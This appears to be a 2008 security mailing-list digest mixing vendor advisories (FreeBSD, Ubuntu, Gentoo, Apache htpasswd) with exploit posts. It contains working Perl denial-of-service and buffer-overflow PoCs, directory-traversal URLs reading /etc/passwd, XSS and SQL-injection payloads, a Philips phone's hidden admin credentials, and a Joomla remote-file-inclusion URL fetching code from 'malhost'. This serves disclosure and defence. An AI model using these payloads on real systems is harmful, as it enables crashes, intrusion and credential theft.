UniversalFtp Server 1.0.44 Multiple Remote Denial of service
# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service
#
[EMAIL PROTECTED] : This bug has been found with a brain , ten fingers, a
keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more
tools hint .
#
#
# Réponse: 226 Completed...
# Statut: Liste du répertoire complétée
# Commande :LIST aa.. .
...
# Réponse: 150 Directory...
# Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before
sending next command... caller=0p12e69f8 --> 0_o
#
#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A)
#
#
# PoC :
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 ";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;
DOINGSOFT-2008-02-11-002 IP Diva VPN SSL many XSS attacks
ID : DOINGSOFT-2008-02-11-002
Discovered : 15/10/2007
Corrected : not knowned, vendors did not response to mail since
Decembre 2007
Publication :11/02/2008
Credits : Ha.ckers.fr Team
Affected Software : IPDiva VPNSSL
Versions :
* 2.2 branch < 2.2.8.84
* 2.3 branch < 2.3.2.14
Vulnerability : XSS vulnerability
Description : The IPDiva Mediation server suffer of a lot of XSS
vulnerability. simply vector as alert("Tested by
Ha.ckers.frTeam"); work for example...
Re: UniversalFtp Server 1.0.44 Multiple Remote Denial of service
There's allready an advisory for : Universalftp http://milw0rm.com/exploits/2787 But there's a couple mores CMD FTP vulnerable added to this one . Regards
PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability
PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability download http://sourceforge.net/projects/plutostatus/ author muuratsalo contactmuuratsalo[at]gmail.com exploit http://localhost/locator/index.php?page=../../../../../../../../../../etc/passwd%00
Rosoft Media Player 4.1.8 Buffer Overflow ( .M3U)
#Rosoft Media Player 4.1.8 Buffer Overflow (.M3U) # # @nolife : Pow...Pow ..If you are kind i'll show my set of supers mega Tools, fuzzers ,and all the automated stuff i use For M3U/ASX/PLS Pow..Pow ... # Nolifing is actually a Disease... Do not be mean with nolife's # # # eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c edi=00ba9078 # eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 # RosoftMediaPlayerFree+0x3b9c: # 00403b9c 8b10mov edx,dword ptr [eax] ds:0023:41414141= # # my $chars= "A" x 4104; my $file="I_Shot_The_Nolife.m3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file has been created \n"; print "Credits:Securfrog";
DOINGSOFT-2008-02-11 - IPDiva VPN SSL Brute force attack
ID : DOINGSOFT-2008-02-11-001 Discovered : 15/10/2007 - Corrected : 15/11/2007 Publication :11/02/2008 Affected Software : IPDiva VPNSSL Versions : Users who autenticate with login et passwd without OTP systems * 2.2 branch < 2.2.8.84 * 2.3 branch < 2.3.2.14 --- Vulnerability : Brute force attack Description : The IPDiva Mediation server suffer of cookie exploitation vulnerability. A mecanism of limitation after a number of bad login/ passwd exist based on a cookie. When the cookie is null, the account is blocked. With the modification of the cookie to a value like 4242, we can try a unlimited number of connection if the cookie is resetted when it reached 2
FreeBSD Security Advisory FreeBSD-SA-08:04.ipsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-08:04.ipsec Security Advisory The FreeBSD Project Topic: IPsec null pointer dereference panic Category: core Module: ipsec Announced: 2008-02-14 Credits:Takashi Sogabe, Tatuya Jinmei Affects:FreeBSD 5.5 Corrected: 2008-02-14 11:49:39 UTC (RELENG_5, 5.5-STABLE) 2008-02-14 11:50:28 UTC (RELENG_5_5, 5.5-RELEASE-p19) CVE Name: CVE-2008-0177 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://security.FreeBSD.org/>. I. Background The IPsec suite of protocols provide network level security for IPv4 and IPv6 packets. FreeBSD includes software originally developed by the KAME project which implements the various protocols that make up IPsec. II. Problem Description There is an improper reference to a data structure in the processing of IPsec packets, which can result in a NULL pointer being dereferenced. III. Impact A single specifically crafted IPv6 packet could cause the kernel to panic, when the kernel had been configured to process IPsec and IPv6 traffic. This requires IPSEC to be compiled into the kernel, it does not necessarily have to be configured at that point. IV. Workaround No workaround is available, but kernels which does not include IPsec support are not vulnerable. The GENERIC and SMP kernel configurations distributed with FreeBSD releases do not include IPsec support. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 5-STABLE, or to the RELENG_5_5 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 5.5 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-08:04/ipsec.patch # fetch http://security.FreeBSD.org/patches/SA-08:04/ipsec.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_5 src/sys/netinet6/ipcomp_input.c 1.7.4.2 RELENG_5_5 src/UPDATING1.342.2.35.2.20 src/sys/conf/newvers.sh 1.62.2.21.2.21 src/sys/netinet6/ipcomp_input.c 1.7.4.1.4.1 - - VII. References http://www.kb.cert.org/vuls/id/110947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177 The latest revision of this advisory is available at http://security.FreeBSD.org/advisories/FreeBSD-SA-08:04.ipsec.asc -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (FreeBSD) iD8DBQFHtC0HFdaIBMps37IRAt5gAKCGnYEX3r7n0Dsypmfv2m1J9pgICwCfd6uH Gy2w6OYNovnfrb7EN0jWCjM= =jHy3 -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-08:03.sendfile
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-08:03.sendfile Security Advisory The FreeBSD Project Topic: sendfile(2) write-only file permission bypass Category: core Module: sys_kern Announced: 2008-02-14 Credits:Kostik Belousov Affects:All supported versions of FreeBSD Corrected: 2008-02-14 11:45:00 UTC (RELENG_7, 7.0-PRERELEASE) 2008-02-14 11:45:41 UTC (RELENG_7_0, 7.0-RELEASE) 2008-02-14 11:46:08 UTC (RELENG_6, 6.3-STABLE) 2008-02-14 11:46:41 UTC (RELENG_6_3, 6.3-RELEASE-p1) 2008-02-14 11:47:06 UTC (RELENG_6_2, 6.2-RELEASE-p11) 2008-02-14 11:47:39 UTC (RELENG_6_1, 6.1-RELEASE-p23) 2008-02-14 11:49:39 UTC (RELENG_5, 5.5-STABLE) 2008-02-14 11:50:28 UTC (RELENG_5_5, 5.5-RELEASE-p19) CVE Name: CVE-2008-0777 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit http://security.FreeBSD.org/>. I. Background The sendfile(2) system call allows a server application (such as a HTTP or FTP server) to transmit the contents of a file over a network connection without first copying it to application memory. High performance servers such as the Apache HTTP Server and ftpd use sendfile. II. Problem Description When a process opens a file (and other file system objects, such as directories), it specifies access flags indicating its intent to read, write, or perform other operations. These flags are checked against file system permissions, and then stored in the resulting file descriptor to validate future operations against. The sendfile(2) system call does not check the file descriptor access flags before sending data from a file. III. Impact If a file is write-only, a user process can open the file and use sendfile to send the content of the file over a socket, even though the user does not have read access to the file, resulting in possible disclosure of sensitive information. IV. Workaround No workaround is available, but systems are only vulnerable if write-only files exist, which are not widely used. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 5-STABLE, 6-STABLE, or 7.0-PRERELEASE, or to the RELENG_7_0, RELENG_6_3, RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 5.5, 6.1, 6.2, 6.3, and 7.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 6.2, 6.3, and 7.0] # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile.patch # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile.patch.asc [FreeBSD 6.1] # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile61.patch # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile61.patch.asc [FreeBSD 5.5] # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile55.patch # fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile55.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_5 src/sys/kern/kern_descrip.c 1.243.2.11 RELENG_5_5 src/UPDATING1.342.2.35.2.20 src/sys/conf/newvers.sh 1.62.2.21.2.21 src/sys/kern/kern_descrip.c 1.243.2.9.2.1 RELENG_6 src/sys/kern/kern_descrip.c 1.279.2.16 src/sys/kern/uipc_syscalls.c 1.221.2.5 RELENG_6_3 src/UPDATING 1.416.2.37.2.5 src/sys/conf/newvers.sh 1.69.2.15.2.4 src/sys/kern/kern_descrip.c 1.279.2.15.2.1 src/sys/kern/uipc_syscalls.c 1.221.2.4.4.1 RELENG_6_2 src/UPDATING1.416.2.29.2.15 src/sys/conf/newvers.sh 1.69.2.13.2.14 src/sys/kern/kern_descrip.c 1.279.2.9.2.1 src/sys/kern/uipc_syscalls.c 1.221.2.4.2.1 RELENG_6_1 src/UPDATING
Philips VOIP841 Multiple Vulnerabilities
Secure Network - Security Research Advisory
Vuln name: Philips VOIP841 Multiple Vulnerabilities
Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web
Server Version 1.5 (simple httpd)
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.consumer.philips.com/consumer
Author(s): Luca "ikki" Carettoni - [EMAIL PROTECTED]
Vendor disclosure: 23rd January 2008
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 14th February 2008
Advisory number: SN-2008-01
Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com
*** SUMMARY ***
VOIP841 is one of the first DECT cordless phones with an embedded Skype client.
Without a computer, it is possible to call directly other Skype users or
international numbers using SkypeOut
as well as the regular PSTN line. It is important to notice that it is Skype
Certified and presented as a best seller
on the "Skype Shop" online.
Multiple vulnerabilities have been found in the latest version of this VOIP
phone, ranging from an hidden administration
account to XSS and directory traversal. Various consequences are associated
with these issues, such as theft
of Skype authentication credentials stored in the phone and information
disclosure.
In order to exploit some vulnerabilities, a regular user should be
authenticated.
However, using the hidden administration account it is possible to easily
bypass this security mechanism.
*** VULNERABILITY DETAILS ***
(a) Hidden Administration Account
The device provides a comfortable web management console, protected with a
basic HTML Authentication.
The default account is set to "Philips:voip841".
We discovered an hidden administration account which is probably used during
technical remote assistance.
In the file "/var/cnxt/service", there is the BASE64 string
"c2VydmljZTpzZXJ2aWNl" which represents
the account "service:service".
Using these credentials it is possible to login into the web administration
console with admin privileges.
The previous user enables also a "secret" tab called [Change MAC Address] where
it is possible (as the name implies)
to change the hardware address of the network interface.
(b) Directory Listing, Directory Traversal
The embedded webserver doesn't sanitize any kind of user input. The directory
listing option is also enabled.
Using the previous account it is possible to browse every directory on the
device and to retrieve the content
of any file with a simple HTTP request.
Let's see a self explaining example:
jungle ikki $ telnet 192.168.1.10 80
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash
Connection closed by foreign host.
(c) Cross Site Scripting (XSS)
Due to the absence of input filters it is possible to inject scripting code
inside the 404 standard response page.
In this way it is possible to trigger XSS attacks with a simple HTTP request
like the following:
GET /var/htdocs/alert("XSS"); HTTP/1.0
Host: 192.168.1.10
404 File Not Found
httpd server: The requested URL '/var/htdocs/alert("XSS");'
was not found on this server.
(d) Insecure Storage
Browsing the device filesystem, we have noticed the presence of sensitive
information stored in an insecure way.
Just to show the possible risks, we report the possibility to retrieve Skype
credentials used by the device
and inserted by the user during the configuration process.
In the file "/var/jffs2/data/save.dat", the embedded Skype client stores
temporary information such as
the Skype account (username and password) in clear text.
Another issue is related to the change password procedure for the web
management console: every operation
done on the web console is logged on a temporary file present in the directory
"/tmp".
When an administrator changes the web authentication password, the old and the
new values are revealed into
the file "apply.log" generated by the cgi-bin called "apply".
## CUT HERE ##
<22:02:11.94> apply cgi start...
<22:02:11.94> Content length : 64
<22:02:11.94>
btn_action=admin&edit_pwd1=ikki&edit_pwd2=ikki&rb_defaults=rb_no
<22:02:11.94> 0 : [btn_action] = [admin]
<22:02:11.94> 1 : [edit_pwd1] = [ikki]
<22:02:11.94> 2 : [edit_pwd2] = [ikki]
<22:02:11.94> 3 : [rb_defaults] = [rb_no]
<22:02:11.94> Action : [4] admin
<22:02:11.94> OldUser:philips:voip841
<22:02:11.94> NewUser:ikki
<22:02:11.94> Encoded:philips:ikki
## CUT HERE ##
*** EXPLOIT ***
Attackers may exploit these issues thr
Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php
Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008
Introduction:
Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.
In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation, by defining RG_EMULATION false. In older Joomla versions,
this
was defined in globals.php instead.
Users upgrading, without touching configuration.php (quite typical),
will have RG_EMULATION
unset, resulting in the following vulnerability.
In Revision 7424 of globals.php, the 'configuration.php' file is
included
before registerGlobals() is called, allowing a malicious peer to
override any value set in configuration.php.
Details:
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
if( defined( 'RG_EMULATION' ) === false ) {
if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
require( dirname(__FILE__).'/configuration.php' );
}
if( defined( 'RG_EMULATION' ) === false ) {
// The configuration file is old so default to on
define( 'RG_EMULATION', 1 );
}
}
The registerGlobals function is called *after* having included
'configuration.php':
} else if (ini_get('register_globals') == 0) {
// php.ini has register_globals = off and emulate = on
registerGlobals();
Maliciously set GET variables cause variables set by configuration.php
to be overwritten.
Looking in index.php:
require( 'globals.php' );
require_once( 'configuration.php' );
Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).
The exploit:
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s
cript.txt
Workaround:
In index*.php and administrator/index*.php change:
require_once( 'configuration.php' );
to
require('configuration.php');
Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by
default for security
Regards,
Hendrik-Jan Verheij
BWSS B.V.
[USN-578-1] Linux kernel vulnerabilities
=== Ubuntu Security Notice USN-578-1 February 14, 2008 linux-source-2.6.15 vulnerabilities CVE-2006-6058, CVE-2006-7229, CVE-2007-4133, CVE-2007-4997, CVE-2007-5093, CVE-2007-5500, CVE-2007-6063, CVE-2007-6151, CVE-2007-6206, CVE-2007-6417, CVE-2008-0001 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: linux-image-2.6.15-51-386 2.6.15-51.66 linux-image-2.6.15-51-686 2.6.15-51.66 linux-image-2.6.15-51-amd64-generic 2.6.15-51.66 linux-image-2.6.15-51-amd64-k8 2.6.15-51.66 linux-image-2.6.15-51-amd64-server 2.6.15-51.66 linux-image-2.6.15-51-amd64-xeon 2.6.15-51.66 linux-image-2.6.15-51-hppa322.6.15-51.66 linux-image-2.6.15-51-hppa32-smp 2.6.15-51.66 linux-image-2.6.15-51-hppa642.6.15-51.66 linux-image-2.6.15-51-hppa64-smp 2.6.15-51.66 linux-image-2.6.15-51-itanium 2.6.15-51.66 linux-image-2.6.15-51-itanium-smp 2.6.15-51.66 linux-image-2.6.15-51-k72.6.15-51.66 linux-image-2.6.15-51-mckinley 2.6.15-51.66 linux-image-2.6.15-51-mckinley-smp 2.6.15-51.66 linux-image-2.6.15-51-powerpc 2.6.15-51.66 linux-image-2.6.15-51-powerpc-smp 2.6.15-51.66 linux-image-2.6.15-51-powerpc64-smp 2.6.15-51.66 linux-image-2.6.15-51-server2.6.15-51.66 linux-image-2.6.15-51-server-bigiron 2.6.15-51.66 linux-image-2.6.15-51-sparc64 2.6.15-51.66 linux-image-2.6.15-51-sparc64-smp 2.6.15-51.66 After a standard system upgrade you need to reboot your computer to effect the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-386, linux-powerpc, linux-amd64-generic), a standard system upgrade will automatically perform this as well. Details follow: The minix filesystem did not properly validate certain filesystem values. If a local attacker could trick the system into attempting to mount a corrupted minix filesystem, the kernel could be made to hang for long periods of time, resulting in a denial of service. (CVE-2006-6058) Alexander Schulze discovered that the skge driver does not properly use the spin_lock and spin_unlock functions. Remote attackers could exploit this by sending a flood of network traffic and cause a denial of service (crash). (CVE-2006-7229) Hugh Dickins discovered that hugetlbfs performed certain prio_tree calculations using HPAGE_SIZE instead of PAGE_SIZE. A local user could exploit this and cause a denial of service via kernel panic. (CVE-2007-4133) Chris Evans discovered an issue with certain drivers that use the ieee80211_rx function. Remote attackers could send a crafted 802.11 frame and cause a denial of service via crash. (CVE-2007-4997) Alex Smith discovered an issue with the pwc driver for certain webcam devices. A local user with physical access to the system could remove the device while a userspace application had it open and cause the USB subsystem to block. (CVE-2007-5093) Scott James Remnant discovered a coding error in ptrace. Local users could exploit this and cause the kernel to enter an infinite loop. (CVE-2007-5500) Venustech AD-LAB discovered a buffer overflow in the isdn net subsystem. This issue is exploitable by local users via crafted input to the isdn_ioctl function. (CVE-2007-6063) It was discovered that the isdn subsystem did not properly check for NULL termination when performing ioctl handling. A local user could exploit this to cause a denial of service. (CVE-2007-6151) Blake Frantz discovered that when a root process overwrote an existing core file, the resulting core file retained the previous core file's ownership. Local users could exploit this to gain access to sensitive information. (CVE-2007-6206) Hugh Dickins discovered the when using the tmpfs filesystem, under rare circumstances, a kernel page may be improperly cleared. A local user may be able to exploit this and read sensitive kernel data or cause a denial of service via crash. (CVE-2007-6417) Bill Roman discovered that the VFS subsystem did not properly check access modes. A local user may be able to gain removal privileges on directories. (CVE-2008-0001) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-51.66.diff.gz Size/MD5: 2867295 780632d44336275640f237d8c960cd58 http://security.u
Apache web server 2.2: htpasswd predictable salt weakness
Disclaimer:
This is not the first time this issue has been discussed. Andreas
Steinmetz posted about the problem for an Apache httpd release in 2003.
http://www.securityfocus.com/archive/1/339138
http://www.securityfocus.com/bid/8707
Philipp Krammer reported that he notifed the vendor over five years
ago, in January 2003. http://www.securityfocus.com/archive/1/339163
What's new is
1) The vendor has released another major version of the
affected software, Apache web server 2.2, with the same flaw.
2) While no official patch is available (due to the vendor's inaction),
an unofficial patch is now available.
-Peter
http://www.tux.org/~peterw/
Background:
Apache web server supports three different algorithms for
"encrypted" passwords for HTTP Basic authentication:
- Unix-style crypt() passwords: uses a 12 bit salt (4096
possible values) and only the first 8 characters of the
cleartext password are used
- SHA hashes: no salt; any given password can have only one
{SHA} representation
- MD5 passwords: based on the BSD MD5 crypt routine, this
provides for 48 bits of salt, for a theoretical 281 trillion
(281,474,976,710,656) possible representations of any password
Apache web server includes a command-line utility called 'htpasswd'
for managing the files used for HTTP Basic authentication. It can be
used (depending on the host OS) to create encrypted passwords with
any of the supported algorithms.
Problem:
The htpasswd utility uses predictable salts for the salted algoritms
(Unix-style "CRYPT" and MD5). htpasswd uses the standard C rand()
function to generate "random" salts. In order to use rand(), htpasswd
seeds the random number generator with the srand() function. And that's
where the Apache developers made a critical mistake -- htpasswd
merely uses the time of day (seconds since the Epoch, time(NULL)) to
seed the random number generator.
As a result:
- Salts created by htpasswd are very predictable.
- The universe of salts for htpasswd is far less than the MD5 algorithm
provides for -- 29 bits vs. 48, or 0.000191 percent of the range that
should be used for MD5.
- Any passwords encrypted by htpasswd within the same second of
system clock time will have the same salt, e.g.
$ htpasswd -nbm user1 pass1; htpasswd -nbm user2 pass2; \
htpasswd -nbm user3 pass2
user1:$apr1$7jv93/..$2J9qu4mN2zms5O42vw/XE.
user2:$apr1$7jv93/..$55cRqVaWTSB1YQpeD5uYe0
user3:$apr1$7jv93/..$55cRqVaWTSB1YQpeD5uYe0
All three users have the same salt, "7jv93/..", and user2 and user3
have the same encrypted password representation.
Clearly, this is not good.
Furthermore, as you can see in that example, and as Andreas Krennmair
reported to the Apache Group in 2004, the htpasswd utility does not
use the full 48 bits of salt for the MD5 algorithm -- the last two
characters are always "..". So htpasswd tries creates 36-bit salt strings.
Given that the srand() problem both reduces the universe to something
like 29 bits[0] *and* makes the salt highly predictable, this 36-vs-48
distinction is a moot point -- as long as the srand() seeding is bad.
The problem appears completely contained within the htpasswd utility;
Apache web server handles all properly encrypted passwords as it should.
Workarounds:
1) If you are concerned about the possibilty of the vastly reduced
salt space making your password tables vulnerable to pre-computed
dictionary attacks, use an updated htpasswd utility to re-encrypt
all MD5 or CRYPT passwords.
2) Use an alternate tool for generating your password hashes.
Implementations of the CRYPT and "apr1" MD5 algorithms are available
for various programming languages and platforms -- you don't need to
use the inferior tool from the Apache project.
Solution:
htpasswd should at least use a more random seed for the srand() calls
so that rand() can produce less predictable salts. It should also, as
Andreas Krennmair noted, make full use of the 48-bit-wide salt capability
of its "apr1" MD5 algorithm.
Patches:
Patches are available in Apache's "issues" database that correct both the
weak seeding of srand() and, thanks to Andreas, the 36/48 bit salt size
for MD5:
http://issues.apache.org/bugzilla/show_bug.cgi?id=31440
Here's sample output from a patched htpasswd utility:
$ htpasswd -nbm user1 pass1; htpasswd -nbm user2 pass2; \
htpasswd -nbm user3 pass2
user1:$apr1$wMdual6C$4.JZNIEfbWvF7OKvpsTGO0
user2:$apr1$LCXYBrpM$6ypjd9FWcVjt6niwCHst71
user3:$apr1$7vefL1ic$6WdQmN9sMUQvQvMGVyHU//
The patch I submitted to the Apache group
1) by default makes use of the /dev/urandom device that is available
on most modern open systems OSes
2) allows the user to specify another seed source (such as /dev/random)
via an environment variable
3) prints a warning if it has to fall back to using time()
Users of Microsoft Windows or other target platforms that lack /dev/urandom
might want to improve on thi
etomite xss
Homepage: http://www.etomite.com/
Tested Version: 0.6.1 Final
Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill
This is a flaw because $_SERVER['PHP_INFO'] is being trusted.
$_SERVER['PHP_INFO'] will contain this value when the exploit url is used:
/index.php/">alert("test")/fill
/fill is removed.
Trust no one.
Michael Brooks
[ GLSA 200802-07 ] Pulseaudio: Privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200802-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Pulseaudio: Privilege escalation Date: February 13, 2008 Bugs: #207214 ID: 200802-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in pulseaudio may allow a local user to execute actions with escalated privileges. Background == Pulseaudio is a networked sound server with an advanced plugin system. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/pulseaudio < 0.9.9 >= 0.9.9 Description === Marcus Meissner from SUSE reported that the pa_drop_root() function does not properly check the return value of the system calls setuid(), seteuid(), setresuid() and setreuid() when dropping its privileges. Impact == A local attacker could cause a resource exhaustion to make the system calls fail, which would cause Pulseaudio to run as root. The attacker could then perform actions with root privileges. Workaround == There is no known workaround at this time. Resolution == All Pulseaudio users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/pulseaudio-0.9.9" References == [ 1 ] CVE-2008-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0008 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200802-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHs3VAuhJ+ozIKI5gRArmoAJ9SCqxjbnAssnUt34QI8HtpLXzg8QCfQ1tl 25xRVcl7FL2lc0RTu8mGqgo= =cDWF -END PGP SIGNATURE-
Re: Vwar New Bug
Basically a dup of http://packetstormsecurity.org/0608-exploits/vwar150multi.txt On Wed, Feb 13, 2008 at 10:50:53AM -, [EMAIL PROTECTED] wrote: > Vendor : Www.Vwar.De > Credits : Pouya_Server > Vuln. Ver : v1.5.0 > Http://pouya-server.blogfa.com > [EMAIL PROTECTED] > --- > http://[host]/vwar/war.php?s=[SQL] > http://[host]/vwar/war.php?page=[SQL] > http://[host]/vwar/war.php?showgame=[SQL] > http://[host]/vwar/war.php?sortby=[SQL]
artmedic weblog multiple local file inclusion vulnerabilities
artmedic weblog multiple local file inclusion vulnerabilities download http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip author muuratsalo contactmuuratsalo[at]gmail.com exploits http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00 http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00
[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011 | FIX INFORMATION Application:Astrosoft HelpDesk Versions Affected: < 1.95.228 Vendor URL: http://astrosoft.ru/ Bugs: Multiple XSS Injections Exploits: YES Reported: 29.01.2008 Date of Public Advisory:04.02.2008 Vendor response:05.02.2008 Updated Report: 14.02.2008 Solution: HelpDesk was altered to fix this flaw on 13.02.2008. Updated version - 1.95.228 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
ELFdump crash when analyzing crafted ELF file.
__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c, v 1.12.8.2 2006/01/28
18:40:55 marcel Exp $");
--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--
Advisory:
Software : elfdump
Version : 1.12.8.2 2006/01/28 18:40:55
Author : Jake Burkholder <[EMAIL PROTECTED]>
Remote : NO
Execution of code : NO
Privilege scalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <[EMAIL PROTECTED]>
Exploit by : INTECO-CERT - David Reguera Garcia <[EMAIL PROTECTED]>
Description : When elfdump analyzes an "evil" elf, the application crashes
and causes a Segmentation fault: 11
Affected OS:
- FreeBSD:
- 5.5 - TESTED AND FOUND
- 6.2 - TESTED AND FOUND
- 6.3 - TESTED AND FOUND
- Maybe others, the elfdump utility first appeared in FreeBSD 5.0
Techninal information:
The problem resides in the use of le32dec, be32dec ... without validate the
input address.
Explotation
An example of this explotation can be the following:
In the main function we can find the following call:
offset = elf_get_off(e, (char *)sh + shstrndx * shentsize, SH_OFFSET);
sh: mapped area with the evil ELF + e_shoff (offset of the section header).
e_shoff, shstrndx and shentsize are used directly from the mapped ELF.
What is the problem? elf_get_off, not verifies if the address is out of
range. If we use e_shoff in ELF out of range, the application may crash:
#define elf_get_off elf_get_quad
u_int64_t
elf_get_quad(Elf32_Ehdr *e, void *base, elf_member_t member)
{
u_int64_t val;
val = 0;
switch (e->e_ident[EI_CLASS]) {
case ELFCLASS32:
base = (char *)base + elf32_offsets[member];
switch (e->e_ident[EI_DATA]) {
case ELFDATA2MSB:
val = be32dec(base);
break;
case ELFDATA2LSB:
val = le32dec(base);
break;
case ELFDATANONE:
errx(1, "invalid data format");
.
When does it crash? It is easy, for example an ELF with e_ident[EI_CLASS] is
ELFCLASS32 and e_ident[EI_DATA] is ELFDATA2LSB, then it executes:
val = le32dec(base);
le32dec is this inline function:
